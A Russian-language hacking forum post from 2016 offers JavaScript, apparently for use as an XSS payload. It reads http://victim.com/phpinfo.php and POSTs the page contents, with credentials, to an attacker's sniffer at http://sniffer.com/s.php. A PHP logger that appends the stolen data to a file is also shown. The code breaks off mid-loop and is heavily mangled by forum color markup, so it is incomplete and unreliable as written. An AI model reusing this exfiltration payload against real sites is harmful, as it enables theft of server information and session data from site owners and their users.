21.04.2016, 23:01
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Файл может не влезть в GET запрос по причине 414-ой ошибки. Вот что надумал:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
var[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://victim.com/phpinfo.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onreadystatechange[/COLOR][COLOR="#007700"]= function() {
if ([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]readyState[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) {
if([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]200[/COLOR][COLOR="#007700"]) {
var[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]XMLHttpRequest[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]open[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'http://sniffer.com/s.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]setRequestHeader[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Content-Type'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'application/x-www-form-urlencoded'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]withCredentials[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'file='[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]xhr[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]responseText[/COLOR][COLOR="#007700"]);
var[/COLOR][COLOR="#0000BB"]aBody[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Uint8Array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]body[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]length[/COLOR][COLOR="#007700"]);
for (var[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]
[/COLOR]
[/COLOR]
s.php:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]FILE_APPEND[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[/COLOR]
|
|
|